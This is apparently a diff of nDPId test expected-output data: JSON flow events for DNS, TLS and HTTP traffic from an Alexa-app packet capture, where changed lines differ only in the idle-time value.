00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976116084,"flow_last_seen":1490976117005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00948{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00948{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 